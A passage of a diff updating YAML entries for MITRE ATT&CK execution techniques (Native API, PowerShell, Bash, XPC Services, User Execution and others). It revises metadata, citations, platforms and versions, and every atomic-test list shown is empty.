-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25172,9 +25487,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25191,19 +25506,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25212,7 +25526,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25249,11 +25563,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25290,11 +25603,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25313,13 +25625,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25398,12 +25709,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25414,6 +25724,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25424,16 +25735,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25464,14 +25775,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25537,39 +25845,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25578,6 +25860,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25590,19 +25873,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -25645,7 +25951,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -25661,72 +25967,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -25734,7 +26043,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25749,7 +26062,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -25776,6 +26089,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -25786,15 +26103,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -25811,7 +26132,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25859,7 +26180,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -25892,12 +26213,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -25958,8 +26278,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -25981,12 +26302,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26064,14 +26384,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26129,36 +26448,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26179,25 +26473,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
